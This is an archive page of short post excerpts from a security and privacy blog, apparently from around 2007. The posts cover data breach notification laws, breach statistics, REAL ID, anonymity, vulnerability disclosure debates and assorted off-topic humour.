Via Chris Hoff, “Harvard Business Review: Excellent Data Breach Case Study…” we learn that the Harvard Business Review has a case study, “Boss, I Think Someone Stole Our Customer Data.” The fictitious company profiled is Flayton Electronics, a regional electronics chain with 32 stores across six states. The premise of the fictitious data breach focuses […]


No, Breach Notification Service is a Good Sign

Over at Dark Reading, there’s a story about First Advantage Membership Services launching a breach notification service. Andrew Conry-Murray starts out: You know data security breaches are way too common when a company builds a business around customer notification of stolen information. and he ends: I applaud companies that comply with notification requirements. It’s the […]


Giving Data to Auditors

In light of well-publicized failures to maintain appropriate controls by the ‘final four’ audit firms, giving data to auditors without a clear and compelling business purpose is a bad idea. It’s such a bad idea, even an auto body shop objects: Auto body repair shops in British Columbia are complaining to the province’s privacy commissioner […]


Typical British overstatement

I saw a BBC headline, “Huge payout in US stuttering case“, and figured that somebody who stutters must have been harassed at work or something, and got a settlement of $5 mil. WRONG. What happened is this: Six US citizens who, as children, were used in an experiment that tried to induce stuttering have been […]


Second Breach Closure: Verus?

I’ve been fond of saying that no company goes under because of a breach. It used to be there was one exception, CardSystems Solutions. There now appears to be a second, Verus, Inc, a medical information processor that revealed information on customers of at least five hospitals. “Medical IT Contractor Folds After Breaches.” So that […]


Examining Wikipedia Anonymous Edits

It’s recently been amusing to look at where Wikipedia’s anonymous edits come from. There have been many self-serving edits from obvious places, as well as selfless ones from unexpected sources. I am most amused by this selfless edit which came from IP address 132.185.240.120, which translates to webgw0.thls.bbc.co.uk. I can only think that had the […]


Breach outliers: $118m charge for TJX

The Associated Press reports that “TJX profit plunges on costs from massive data breach:” FRAMINGHAM, Mass. (AP) – TJX’s second-quarter profit was cut by more than a half as the discount store owner recorded a $118 million charge due to costs from a massive breach of customer data….About one-tenth of the charge from the data […]


I can't conceive of a better use for anonymity

There’s a fascinating little sidebar article in the Economist (4 August 2007), “Misconceived:” Now that anonymity is no longer possible, there has been a huge decline in the number willing to donate. So more patients travel for treatment to countries where anonymity is still legal. If this new proposal is implemented, it may give such […]


British House of Lords gets it

From a report published August 10 by the House of Lords select committee on science and technology: 5.55.  We further believe that a data security breach notification law would be among the most important advances that the United Kingdom could make in promoting personal Internet security. We recommend that the Government, without waiting for action at […]


ChoicePoint's data quality

In a comment, Tom Lyons asked: I have two clients who are asking me to investigate matters with Choice Point as it relates to inaccurate employment records provide to prospective employers. I am seeking persons who have similar experiences to determine a “pattern and practice” on the part of Choice Point. I don’t know Mr. […]


Pseudonyms in the News: Fake Steve Jobs Outed

Brad Stone of the New York Times is a killjoy. Geez. Part of the joy of reading The Secret Diary of Steve Jobs was thinking of him as Fake Steve Jobs, and nothing more. Sure, it’s all good that his employer was so delighted that FSJ is going to be hosted by them, now, […]


German Biometric Trials

The assessment of the Federal Criminal Police Office (BKA) according to which biometric visual-image search systems are not advanced enough to be used by the police to search for persons has led to mixed reactions. The Federal Criminal Police Office presented the fairly sobering research results of its visual-image search systems project on Wednesday in […]


Maybe if I yell at you, you'll trust in what I'm saying

Tourists visiting the White House must now adhere to a dress code which bans jeans, sneakers, shorts, miniskirts, T-shirts, tank tops, and flip-flops. Since this is an extremely important rule, signs were posted and emails sent White House staff (writes Al Kamen in the Washington Post). A telling detail, per the WaPo: The e-mail reminder […]


System Admin Appreciation Day

…is today, July 27. Pizza and beer retailers are standing by, much as florists do on Valentine’s Day. You know what to do.


Metricon 2.0 Registration Closes Friday

Metricon 2.0 looks to be a great set of papers. I’d tell you what I’m looking forward to, but really, I’m looking forward to the whole day. And it’s only $225, but you have to register by Friday.


Full Disclosure debate, 2.0

A poor choice of names (I guess “best UNIX editor” was their second choice), but Silicon.com is doing something that seems worthwhile by launching their Full Disclosure Campaign. Silicon.com wants the government to review its data protection legislation and improve the reporting of information security breaches in the public and private sectors. We are calling […]


Hamster Wheel of Pain™, FOIA edition

So, the USDA messes up and, in response to FOIA requests directed to them about tobacco subsidies, sends records containing taxpayer ID numbers (along, one presumes, with names) to the several FOIA requestors. Meanwhile, an enterprising lad sends a FOIA request about data breaches to North Carolina — a state known for tobacco production. That […]


You can't spell "Really pointless flamefest" without R-O-I

Rich Bejtlich, with whom I do not want to argue about definitions unless I have a much thicker dictionary than he, has taken aim at the (mis?)use of ROI by security people. EC readers may be interested in a blog post by Ken Belva, in which the guy who literally (co)wrote the book on establishing […]


Other comments on the GAO Report

[Added July 21] Roger Grimes, “Identity theft? What identity theft:” Here’s my long-held feeling: If even one customer record is compromised, it should be immediately disclosed to the consumer. None of this, “You need 10,000 or more records stolen before it is reported” or “Only report if likely to be used in financial theft.” Forget […]


What If The Hokey Pokey Is What It's All About?

I’ve always thought that folks in operational security and product security had a whole lot to learn from each other. Unfortunately for the product security people, they now also get to learn about the pain of vendors swooping down on them trying to sell them the latest and greatest crap. Last night, Mary Ann Davidson […]


Whose Line Is It Anyway?

For quite a while now, I’ve been claiming that in order for InfoSec to do its job properly, it needs to understand the business. Yesterday, Jack Jones again showed that he’s in the same camp when he asked us: “Risk Decision Making: Whose call is it?” There he shares his thoughts on how to decide whether […]


Pete Seeger strikes again

The New York Times Magazine with a long article about swimming the Hudson River. Image:Clearwater.org


Electronic data: you can sell it and have it

Mike Rothman has the unmitigated temerity to go on vacation and deprive me of his daily rant^H^H^H^Hincite, but not before remarking on the Certegy data loss incident: So Certegy (a big check processor) loses a couple million records with information like bank accounts and credit card numbers. And Certegy’s president gets interviewed and says because […]


152:1

As governor of Texas, George Bush didn’t see fit to commute any of the 152 death sentences brought before him. (Wikipedia) Good thing Scooter Libby ain’t no poor Texan, because if he was, Bush wouldn’t have ruined his law and order record. (Noted at Discourse.net.) Update: 6 days later, the New York Times notes that […]


More controls creates more risk?

Over at his excellent blog, Chandler Howell referenced an interesting risk analysis performed by a home inspector: “The power switch for the garbage disposal in the sink could be accidentally turned on by a person standing at the sink while their hand was in the disposal.” That is to say, the switch is right next […]


Data on Data Breaches

At the FIRST conference in Seville, Spain, I delivered a presentation about “Data on Data Breaches” that Adam and I put together. The slides, with the notes I made to act as “cue cards” for me, are available as a large PDF file on a slow web server. The main points I tried to make […]


Doctors want more study on overuse of books

(Adds psychiatrist interview, industry comment, paragraphs 4, 7-17) CHICAGO, June 27 (EmergentChaos)- The American Medical Association called for more research into the public health risks of books and reading on Wednesday but stopped short of declaring them addictive. The AMA, which recommended a review of the current publishing system, also said it would leave it […]


Stop Real ID, again

Apparently, the forces of evil have inserted a national ID clause into the immigration bill (two bad bills, risen from the dead together?). Please go to Unreal ID’s action page to send a fax. It only takes a minute.


Maybe things are different (maybe they're the same)

The article to which Adam linked in his post about Dark Side of the Moon mentioned derivative versions of the album as performed by other artists. That got me thinking of memorable covers, such as Senor Coconut’s classic renditions of Kraftwerk tunes (like The Robots and Autobahn). Ultimately, I just gotta throw in a quick […]


Security Tradeoffs

This is from Non Sequitur by Wiley. Since I’ve shrunk it to fit, the guard says to the other: Accept the security breach, or clean a litter box. Take your pick. Click the picture for the full-size one.


Awareness

Last Friday, Amrit again said that no wars are won through awareness and although he repeatedly claims that he’s not against user awareness training, he doesn’t really tell us where he thinks it should fit in. Instead he shows his bias as a former product manager and Gartner analyst and focuses purely on tools by […]


Attacking Metrics

Last week I had the pleasure of having lunch with Alex Hutton from RMI and we got to talking about metrics. Specifically, we talked about how most metrics that we security folks come up with are, well, boring, and effectively useless to upper management. At best they are focused on technical management such as the […]


One Company Gets The Privacy Thing

I currently love my mortgage company. Those that know me in real life, know that I recently bought a house. Yesterday, I received a privacy notice in the mail from them. I figured it was the standard template that everyone uses saying that if I didn’t want my information shared, I should call them up/email […]


The 'Gay Marriage' of Computer Security?

Reading Dale Carpenter’s post on Volokh,”Big win for SSM in Massachusetts,” I was struck by how similar his narrative is to my thinking around breach notice. He writes (and I emphasize): What’s so striking about the vote today is how dramatically support for SSM has grown in the legislature (and in state public opinion polls) […]


Flower Power Sucks

Having the unfortunate luck to be in National Public Radio’s target demographic, I occasionally wind up hearing stories that clearly are pandering to what I will with all due sarcasm refer to as “my generation”. Actually, I’m in the one after that, but I recognize the pandering. Lately, not just on NPR but on my […]


New Hampshire, North Carolina overlap

New Hampshire’s requirement to clue in the AG’s office or your primary regulator took effect 1/31/2007. I have info from NH and NC (but not NY, yet) covering the period since 1/17, so we can see how much overlap there is:

                  New Hampshire   North Carolina
New Hampshire          40               11
North Carolina         11               41

I am eager to […]


Disclosures where they're not required by law

It’s the new normal in the English speaking world. See: “Hard drive stolen from Concordia” hospital in Winnipeg. The Bank of Scotland lost a DVD or CD in the mail, “Bank loses details on 62,000 customers in post.” “Personal banking info goes missing” regarding 120,000 Coastal Community Credit Union in Nanaimo, British Columbia. “Personal information […]


Emergent Downtime

We had some downtime after a failure at our hosting facility. We would like to address the power loss which occurred in our Virginia Datacenter on Wednesday, June 13th. We are still investigating the root cause, but in the interest of full disclosure, here are the facts as we know them today. A more complete […]


Global Biometrics Database, Coming Soon to You

Raiders News Network quotes an Interpol press release, “G8 Give Green Light For Global Biometric Database:” MUNICH, Germany – G8 Justice and Interior Ministers today endorsed a range of vital policing tools proposed by Interpol Secretary General Ronald K. Noble aimed at enhancing global security. Secretary General Noble exposed the global problem of prison escapes […]


Fascinating breach detail: Illinois Department of Financial and Professional Regulation

Here’s detail from an InformationWeek story, “Hackers Blamed For Data Breach That Compromised 300,000:” A hacker broke into the computer network at the Illinois Department of Financial and Professional Regulation this past January and accessed a server that held information on about 1,200,000 people who have licenses or applied for licenses with the department. Susan […]


Laurie, Cameron and Brands (Oh My!)

There’s a fascinating exchange going on between Ben Laurie, Kim Cameron, and Stefan Brands. This is utterly fascinating if you have any interest at all in online identity, but haven’t had the time to compare systems. I’d try to contribute, but I’ve been in the midst of a large project at work. Archival links: Stefan: […]


Wanted: iPod organ donor.

I’m not throwing out a whole iPod just because the headphone jack is hosed. If you have a dead mini iPod (maybe with a smashed display, say?), and you don’t want to take up precious landfill space, leave a comment or send me an email.


I don't know much about art…

…but encasing a skull in millions of bucks worth of diamonds and thinking you’ve made some kind of statement strikes me as uninspired in the extreme. Of course, this matters not, because this is “the work with the highest intrinsic value in modern and contemporary art” according to a guy who works for an insurance […]


"An Empirical Approach to Understanding Privacy Valuation"

Luc Wathieu and Allan Friedman have an article in Harvard Business School’s ‘working knowledge,’ titled “An Empirical Approach to Understanding Privacy Valuation.” In it, they present the results of a survey of 647 people with regard to a number of privacy hypotheses. Their results include: Contrary to some research, the chief privacy concern appears based […]


Failure of Imagination

USA Today tells us, “Sci-fi writers join war on terror,” in which, “the Homeland Security Department [sic] is tapping into the wild imaginations of a group of self-described “deviant” thinkers….” There are many available cheap shots as well as fish to shoot in that barrel. I’m going to take a cheap shot at one not […]


Venn and the art of empirical breach research

As EC readers may recall, I have made various Freedom of Information requests to state governments in order to obtain data regarding breaches reported to them under their various notification laws. This week, I received responses to the latest request I made to New York and North Carolina. New York has 822 pages to send […]


Ministry of Truth in Advertising

The BBC reports that “Ministers set out plan for waste.”…Usually, they at least claim they’re spending our money wisely.


Overwhelmed or Under-notified: Consumers and Breach Notices

In asking why customers don’t leave after a breach, there are two theories that people have put forth that are interestingly contradictory. The first is that they don’t know about the breaches. This was suggested by a questioner at Toorcon Seattle. The second is that customers are overwhelmed with notices. This is popular amongst bankers, […]

 

Marco Pierre White on Intellectual Property

This via Salon’s “The man who made Gordon Ramsay cry” — and let’s face it, making Gordon Ramsay cry is a great place to start. Alex Koppelman asks: …. Do you think a chef’s recipes should be protected as intellectual property? White replies: You can’t reinvent the wheel. Everyone takes from everybody. How many people […]

 

TSA on PBJ: No way

United States congressman Tim Ryan is interested in bringing attention to the meager allotment the U.S. food stamp program provides. This program, for those who don’t know, provides what amounts to scrip which can be used for qualified food purchases to persons who meet a certain needs test. The average food stamp recipient receives $21.00 […]

 

Premature optimization is the root of all evil

The observation is no less true of legislation than it is of code.
Case in point is the debate over whether to trigger breach notifications when a “reasonable” risk of harm or a “significant” risk of harm exists. Everybody is quick to cite California’s breach law, so I’m going to cite New York’s:

 

75% of Britons Want to Know

The European Commission has done an “E-Communications Household Survey,” and found that overwhelmingly, “UK internet users want to be informed of data losses:” Most UK residents want to be informed if their personal data is lost or stolen after a corporate security breach, the latest E-Communications Household Survey from the European Commission (EC) has revealed. […]

 

Reading, Writing, and Arithmetic

I’ve been encountering some really silly software lately. I was trying to visit the homeland stupidity blog, with Safari and the most-excellent pithhelmet, and I get this message: We’re sorry, but we could not fulfill your request for /2007/04/21/astroglide-data-breach-exposes-customer-information/ on this server. An invalid request was received from your browser. This may be caused by […]

 

Shock Horror! Ashcroft Am Not Devil Incarnate!

In 27 B Stroke 6 Threat Level, Kevin Poulsen writes, “News from Bizzaro World: Ashcroft Opposed Taps.” Kevin, your reality tunnel is showing. There are many things that Ashcroft was (I apologize for using the past tense), starting with prig and prude. I’m not particularly a fan of his, but the Venn diagram of what […]

 

On Illegal Wiretaps

What, indeed, was the nature of the “program” before Goldsmith, Comey and Ashcroft — those notorious civil libertarian extremists — called a halt to it, and threatened to resign if the President continued to break the law? And what was the nature and breadth of its legal justification? I am hardly alone in realizing that […]

 

893 Million, and Whadda Ya Get?

♫Another DHS network, and we’re not sharing yet.♫ So reports Haft of the Spear, in “You’ll Share and You’ll Like It!” The Homeland Security and Justice departments have spent $893 million on information-sharing networks in the last two years but still do not have effective networks in place, according to a report from the Government […]

 

Animations of US Flight Patterns

Aaron Koblin of UCLA has an amazing website of animations he’s done using FAA flight data. It’s well worth a look.

 

What, me worry?

TJX sales up, again. Via StorefrontBacktalk: …TJX reported Thursday that its April sales increased another 2 percent, to $1.28 billion…. More importantly, for the thirteen weeks ended May 5, 2007, sales reached $4.2 billion, a 7 percent increase over last year’s $3.9 billion.

 

Disclosure in The UK

Scotsman.com reports “Standard Life customers are hit by breach in security,” and Computerworld.uk reports that a “Laptop containing Southend children’s social services case notes bought on eBay.” In the US, neither of these would even be news. They’re both small, first-time mistakes. Both would probably require notice under state law. However, it’s anarchy in […]

 

Facebook Hangover

On Dave Farber’s list, Brock Meeks pointed us to a delightful Facebook Smackdown. Brock says, What do Facebook, the CIA and your magazine subscription list have in common? Maybe more than you think… http://www.albumoftheday.com/facebook/ Trust me, it’s worth the look. And indeed it is worth looking at, along with Patrick Schitt’s contribution of the background […]

 

Interesting Stuff From Microsoft

My colleague Dave Ladd has a post “Security Education v. Security Training:” Unfortunately, there’s an assumption held by many in our (IT) community that the road to better security leads to “drinking from the fire hose” – that is to say, employees are rocketed through week long training classes, then drilled and tested on security […]

 

Encryption Is Security Theater

Last night I was talking with a certain analyst from a large company that we’ve all heard from and we got into a discussion about most security people not understanding encryption at all, to the point that it is assumed to be a cure-all. In fact, with the exception of encrypting data at rest (and […]

 

"The vendor made me do it"?

Via StorefrontBacktalk comes news that Following lawsuits in February against some of the nation’s largest retailers for illegally revealing too much credit card information on printed receipts, two of those retailers are now suing their POS vendors. In the last couple of weeks, two of those retail defendants—Charlotte Russe and Shoe Pavillion—have sued their POS […]

 

DHS Sends a Flunky to Do A Man's Job

So DHS has managed to cancel all but one “Town Hall Meeting” about REAL ID. They’re sending a “Richard Barth, Assistant Secretary, Office of Policy Development” to talk to the fine people of San Francisco about the travesty of a national ID card which is REAL ID. We’ll waste $20 billion dollars on this nonsense, […]

 

A Market To Be Tapped

I’ve often talked about how people will pay for privacy when they understand the threat. In that light, the New York Times article “Phone Taps in Italy Spur Rush Toward Encryption” is fascinating: Drumming up business would seem to be an easy task for those who sell encrypted cellphones in Italy. All they have to […]

 

WOOT! Looks Exciting

Via Nate, “WOOT = Usenix + Blackhat:” The call for papers is now up for a new Usenix workshop, WOOT (Workshop On Offensive Technologies, but don’t think the name came before the acronym.) The workshop will be co-hosted with Usenix Security and will focus on new practical attacks. I was recently saying that vulnerability research […]

 

Announcing…The Security Development Lifecycle Blog

My team at work announced the launch of “The Security Development Lifecycle” blog today. After the intro post, Michael Howard leads off with “Lessons Learned from the Animated Cursor Security Bug.” I’m pretty excited. We’re focused on transparency around what we’re learning as we continue to develop the SDL.

 

Security Through Stupidity

In my last post on security, I promised a tale, and I ought to deliver on that before it becomes nothing more than a good intention. Some time ago, so long ago that it no longer matters, I bought a piece of network stereo equipment. It was one of these little boxes that lets you […]

 

Gartner Discovers Offshoring

According to CIO Forum, Gartner has discovered some amazing things. There’s offshoring to India, and it’s growing at a “staggering” 16% per year. And lots of manufacturing is being done in China now. And the US better wake up ASAP because it is “in imminent danger of becoming an industry of failure.” This is a […]

 

One Third of McAfee Survey Respondents Are Not Paying Attention

So reports Sharon Gaudin in Information Week. Actually, I think she picked up the story as McAfee spun it: “Companies Say Security Breach Could Destroy Their Business:” One-third of companies said in a recent poll that a major security breach could put their company out of business, according to a report from McAfee. The security […]

 

Save Chocolate

“Don’t Mess With Our Chocolate,” says Guittard. Summary: the FDA is considering changing the definitions of “chocolate” and “chocolate flavored” and “chocolaty” so that they don’t have to put as much cocoa solids in it to make it be “chocolate.” The FDA is soliciting comments, and the cutoff is April 25, so that’s not much […]

 

When Do Customers Flee?

So I’ve long thought that consumers treat breaches as mistakes, and generally don’t care. In reading the Ponemon reports, it seems that the average customer churn is 2%. (I’ll come back to that number.) But it gets worse when you have repeated breaches. In the CSO blog, “What, When and How to Respond to a […]

 
 

Disclosure, Discretion and Statistics

One of the very interesting things about mandatory disclosure of breaches is that it adds a layer of legitimacy to the data. If all we have are self-selected reporters, we must investigate what bias that adds. This makes the FBI-CSI report and many others even less useful. New laws that require disclosure give us not […]

 

On Liquid Explosives

Wired’s Danger Room blog has an interesting quote from the inventor of a liquid explosive in “‘Liquid Landmine,’ Qaeda Tool?:” My advice would be to stick with PETN [a high explosive] and rattlesnakes.

 

"What security people won't share with each other"

Scott Blake has a really interesting 3-part podcast interview with Mike Murray. See Mike’s post, “it never ceases to amaze me what security people won’t share with each other,” and go understand why you should give Scott a demerit. (I’d meant to post this months ago, when Scott did the interview. Oops!)

 

Users force Dell to resurrect XP

The Beeb reports. This means that if you want to start speculating in copies of XP, you probably have even longer to wait.

 

Weak Crypto Contest

The 2007 Underhanded C Contest has a marvelous theme — weak crypto. The object of this year’s contest: write a short, simple C program that encrypts/decrypts a file, given a password on the command line. Don’t implement your own cipher, but use a bog-standard strong cipher from a widely available library. […] Your challenge: write […]

 

Credentica White Paper & Presentation

The title of Stefan Brands’ blog post, “New Credentica white paper and other materials,” pretty much says it all. If you think about identity management, you should go check these out. Our white paper discusses all of the features of the U-Prove SDK without going into technical detail. The basic features are: transient ID Tokens; […]

 

Frontiers of Data Disclosure

Howard Schmidt made a glib suggestion that made me laugh, but he has a point. He asked why don’t we just take names, social security numbers, and everyone’s mother’s maiden name and put it in a huge searchable database, so everyone knows that it’s not security information and we can once and for all stop […]

 

Micropayments Company Bought or is that Sold?

Micropayments company Peppercoin, started with technology by Rivest and Shamir, has been bought by Chockstone, a company doing loyalty programs. Supposedly, they bought Peppercoin because it will “increase consumer ‘stickiness’ and brand affinity” and “increase average ticket price more than 12%.” Okay…. I thought that the reason for bearer-level micropayments was the opposite. Right here […]

 

Psychology & Security & Breaches (Oh My!?)

I’ve been talking about disclosure, and how it has the potential to change the way we work. Before it does that, it needs to change the way we think. Change is hard. There’s a decent argument that many things are the way they are because they’ve emerged that way. There existed a froth of competing […]

 

Bejtlich gets it: It's about empiricism

When he mentioned my post he cited a new paper titled A Case of Mistaken Identity? News Accounts of Hacker and Organizational Responsibility for Compromised Digital Records, 1980–2006 by Phil Howard and Kris Erickson. Adam highlighted this excerpt 60 percent of the incidents involved organizational mismanagement as a way to question my assertion that insiders […]

 

Bad Advice on Tax Shelter Patents

Techdirt carries marvelous coverage of the increasing devolution of our intellectual property system. However there is some bad advice in “Be Careful Not To Use Any Patented Tax Shelters This Tax Season.” The bad advice is in the last sentence: So as we get to tax day, besides going over all your tax forms and […]

 

Investment Opportunity of the Year

El Reg reports that Microsoft claims to be sticking to its timetable for shutting down XP. No fewer than three people told me yesterday, “This means I have to buy that Mac Book Pro this year.” They can’t be alone. I have several co-workers running Vista on laptops, and even without the overhead of […]

 

From The "Wish I'd Posted That" Files

Gunnar (as usual) has a great post highlighting the lack of a real cohesive strategy in the security products arena and IT security teams losing sight of the big picture. In particular, he highlights a comment from Andrew van der Stock about using SMS as an out of band authentication mechanism. Man I wish I’d […]

 
 

UK Story On Breaches and Silence

IT Week in the UK writes, “Companies keep silent on data breaches.” There are a couple of interesting quotes: Jonathan Coad, a media specialist at law firm Swan Turton, said newsworthy breaches are often leaked to the press. “Reporting crime to the police is a double-edged sword as invariably the press has found out about […]

 

Disclosure Laws, State-by-State

Philip Alexander writes in Intelligent Enterprise about “Data Breach Notification Laws: A State-by-State Perspective.” The article is short and readable, and points to his new book, which is likely a good read.

 

See, it can be done

I’ll keep this short since you should all be reading Mordaxus’ latest, not this, but speaking of data… This breach report [pdf] from Community National Bank wasn’t sent to consumers, but you can’t say it was short on details.

 

Three on Information Sharing

The New York Times has a story, “Teaching the Police to Stay a Step Ahead of Car Theft:” The police have traditionally kept such conversations quiet, fearing they could tip off aspiring thieves. Mr. Bender’s mission is to bring investigators into the digital age and get them to share information, just as their adversaries are […]

 

We Have Nothing to Fear But Fear Itself

So Ken Belva suggests that we should cordially agree to disagree. (“My Response to Adam Shostack’s Reply on Transparency & Breaches“) I’m happy to be cordial, but I feel compelled to comment on his response. Before I do, I should be clear that I have respect for Ken as a professional, and as someone willing […]

 

Another Side Of Copyright

These days when you read an article about copyright that involves students, it also involves the RIAA or the MPAA. This article in the Chronicle of Higher Education, on the other hand, is about two high-school students taking on Turnitin. The students specifically asked that certain papers of theirs not be included in Turnitin’s database […]

 

UK NHS & Disclosure: A Moral Imperative Example

From Silicon.com, “Pressure grows for UK data loss disclosure:” As a spokeswoman for the Information Commissioner’s Office told silicon.com last year: “There is nothing in the Data Protection Act that legally obliges companies to inform customers when these things occur.” But, from the BBC, “Children’s details taken in theft:” Health bosses in Nottinghamshire have issued […]

 

Stop REAL-ID From Wasting Real Money and Liberty

Welcome to the Stop Real ID Now blog. Not surprisingly, we’ll be talking a lot here about the Real ID Act of 2005… and more specifically about an activism campaign that will use the power of blogs, social networks and art as well as creating partnerships and using media outreach to, we hope, stop the […]

 

TJX Commentary

I keep trying to avoid commenting on TJX, and keep getting drawn back in. The amount of news and analysis out there is large, and I’m selecting islands in the clickstream. (Any advice on who’s covering it well would be appreciated.) In “TJX Lawsuits — 45 Million Credit Cards,” Pete Lindstrom mentions that there are […]

 

Secure Flight @ Home

Prof. R. H. Anssen of the University of Florence, Colorado working under a Department of Homeland Security Advanced Research Projects grant has released a new paper discussing improvements to SecureFlight that make it much more scalable, while adding in grid-computing and privacy-friendly aspects as well. Expanding upon the ideas of K. P. Hilby and J. […]

 

On Anonymity

So Mike Rothman thinks that anonymity is for cowards: During the discussion last night, one guy pointed out that sometimes things are too sensitive or controversial or unpopular to say, so anonymity allows folks to do that. I call bullshit on that. Anonymity is the tool of a coward. And while I agree with Mike […]

 

Portuguese Got to Australia in 1522

Portuguese seafarer Christopher de Mendonca led a fleet of four ships into Botany Bay in 1522. No one noticed before because the map was oriented wrong when it was copied. This is a nice article from news.com.au.

 

Breaches and Brand Damage

Tim Erlin runs some numbers in “Is Brand Damage a Myth” at Ncircle, and Nick Owen follows on with some diplomatically presented thoughts in “Brand Damage, Stock Price and Cockroaches:” My theory is that information security breaches are an indicator of a lack of management competence. Moreover, as discussed previously, information security breaches are […]

 

Privacy's Other Path

Dan Solove writes: Professor Neil Richards (Washington University School of Law) and I have posted on SSRN our new article, Privacy’s Other Path: Recovering the Law of Confidentiality, 96 Georgetown Law Journal __ (forthcoming 2007). The article engages in an historical and comparative discussion of American and English privacy law, a topic that has been […]

 

A Different X-Box Hack

Back in the day, I was a member of FIRST. (Btw, rumor has it Chris and Adam are presenting at their annual conference this summer). At the time, one of the more prolific posters to the mailing list was Robert Hensing from Microsoft (Adam, if you haven’t met Rob, you should look him up). Anyways, […]

 

DoS == Vulnerability?

I think that a Denial of Service condition is a vulnerability, but lots of other people don’t. Last week Dave G. over at Matasano posted a seemingly very simple explanation that nicely sums up the way I’d always been taught to think about these sorts of issues: The ability to halt or shutdown most modern […]

 

Off to Shmoocon!

Where I’ll be explaining that “Security Breaches are good for you.” Come see me speak at 5 PM on Friday. It’ll be … entertaining.

 

Why BitLocker Won't Help Most Companies

A couple of weeks ago, Mike Rothman linked to an article by George Ou about using EFS and BitLocker under Vista. There he made an extraordinary claim: Since BitLocker won’t encrypt additional hard drive volumes, whether they’re logical partitions on the same physical disk or additional disks, you must use EFS to encrypt those volumes […]

 

Ptacek scores, Pre-Blogging Department with the assist!

Matasano’s Thomas Ptacek had a Groucho-like reaction to being included as a “Top 59” infosec influencer in ITSecurity.com’s recent list. EC’s Pre-Blogging Department was initially caught flat-footed on this, but predicted in an update that Tom’s view would gain traction. And it has. Meanwhile, Mark Curphey has stirred the pot by leaving the Security Bloggers’ […]

 

We're number 18, but we try harder…

Adam (or perhaps EC?) is one of the top 59 infosec influencers, sayeth itsecurity.com. Cool. 18. Adam Shostack http://www.emergentchaos.com/ Emergent Chaos is a group blog on security, privacy, liberty and economics – a self-declared “Emergent Chaos jazz combo of the blogosphere.” While the EC bloggers tend to drift off topic with political posts, they […]

 

Reports on Reporting, Compliance

University of Washington researchers Kris Erickson and Philip Howard have an interesting new paper out, “A Case of Mistaken Identity? News Accounts of Hacker and Organizational Responsibility for Compromised Digital Records, 1980–2006.” This is a great survey of the dramatic explosion in reports of breaches. A couple of great quotes: One important outcome of […]

 

Ignorance is Strength

Via a Stitch in Haste, we learn about more members of the ‘sweep it under the rug’ club: David Oliver Burleson, 49, an anesthesiologist whose license was suspended for two years in October 2005 … acknowledged to the Oregon Board of Medical Examiners that he inappropriately touched women whom he had sedated before surgery. The […]

 

"Voluntary" ID Cards

Anybody who objects to their personal details going on the new “Big Brother” ID cards database will be banned from having a passport. James Hall, the official in charge of the supposedly-voluntary scheme, said the Government would allow people to opt out – but in return they must “forgo the ability” to have a travel […]

 

"ist nicht verfügbar"

So we had some random DNS trouble recently. I believe everything should be back to normal, but DNS issues can take a while to propagate and be fixed. So apologies for the non-availability. We’ve made procedural changes to make these less likely in the future. Oh, and we lost the SSNs of everyone who had […]

 

Dennis Lormel's Authoritarian Streak

In a post at the Counter-terrorism blog, “National Security Letters…An Important Investigative Tool for the FBI” Dennis Lormel writes: The Inspector General (IG), U.S. Department of Justice, has issued a report delineating audit findings identifying significant deficiencies in NSL recordkeeping and reporting processes. This determination is quite troubling and inexcusable. Troubling and inexcusable? Well, you’d […]

 

Power Tends to Corrupt

The Justice Department’s inspector general has prepared a scathing report criticizing how the F.B.I. uses a form of administrative subpoena to obtain thousands of telephone, business and financial records without prior judicial approval. The report, expected to be issued on Friday, says that the bureau lacks sufficient controls to make sure the subpoenas, which do […]

 

If It feels so wrong, how can it be so right?

Emacs users get addicted to the standard key bindings (which are also available in Cocoa apps). Microsoft Word doesn’t support these by default, but you can add them through customization. Here are the ones I find most useful: StartOfLine: Control-A; EndOfLine: Control-E. To set these up in Word… …you’ll have to read “Add emacs key […]

 

Responsible Disclosure and Months of Bugs

I had promised myself that I wasn’t going to post about any of the Month of Bugs projects and that everything that needed saying had been said by people far more eloquent than I. But then Michael over at MCW Research came at it from a different angle saying: I whole-heartedly back these projects as […]

 

Emerging dating paranoia

When Adam asked me to guest blog on “Dinner, Movie — and a Background Check — for Online Daters“, I promised him I would do it. And then I read the article and couldn’t think of what to say about it. I’m something of a self-proclaimed expert of internet hookups (as anyone who reads ClueChick, […]

 

DST is Coming, Run For Your Lives!

In a week, the US and Canada are changing when they go to Daylight Savings Time. It must also be a slow news time, as well, because I’ve read several articles like this, “Daylight-Saving Time Change: Bigger than Y2K?” When Y2K came around, a number of us quoted Marvin the Martian (now of the Boston […]

 

Jennifer Granick's awesome explanation

Imagine if, in the 1970s, the tobacco companies had patented devices to measure the health effects of smoking, then threatened lawsuits against anyone who researched their products. I’ve never heard such a clear explanation of why threats to security research are bad. From “Patently Bad Move Gags Critics,” in Wired. The same can be said […]

 

HIDing At Blackhat

Now HID is claiming that they did not demand that Chris or IOActive cancel their talk. As a result the talk is now back on, but with the details about the device and the demo expurgated. As Chris has repeatedly said, this attack is completely generic and works against any passive RFID tag. Additionally, Nicole […]

 

Medical Privacy News

There’s a great editorial about how your prescriptions are bought and sold all over the place, “Electronic prescribing is no panacea” by Dr. Deborah Peel, in Government Health IT. Also, Health Care IT news reports that “Federal privacy panel leader resigns, raps standards:” The leader of a federal panel charged with providing privacy recommendations for […]

 

No, seriously

Somebody — I want to say Rich Mogull, but I cannot find the reference — wrote sarcastically about breach notices almost always saying “At $COMPANY we take security seriously….” as they report how, well…you know. I just finished scanning 183 notice letters I got from New York, covering the last half of 2006. Using an […]

 

Vote Positively With Your Pocketbook

Adam Frucci at Gizmodo is calling for action, “Putting Our Money Where Our Mouths Are: Boycott the RIAA in March.” I don’t disagree with him on the basics. I believe that consumer revolt is a misunderstood power. If you don’t believe me, I can prove it with one TLA: DAT. If your response to that […]

 

Blackhat Do It Again

Looks like HID hasn’t learned anything from Cisco’s experience two years ago. One of these years more vendors will learn how to manage vulnerability disclosure and follow the lead of companies like Microsoft and Cisco rather than sticking their foot in it. Chris Paget a well respected researcher is going to present at Blackhat Federal […]

 

A telling remark

In the “inconvenient coincidences” category, it seems that Al Sharpton’s great-grandfather was a slave owned by relatives of the late segregationist US senator Strom Thurmond. Thurmond’s niece, Ellen Senter (via an AP report) provides an interesting perspective: I doubt you can find many native South Carolinians today whose family, if you traced them back far […]

 

Why We Fight

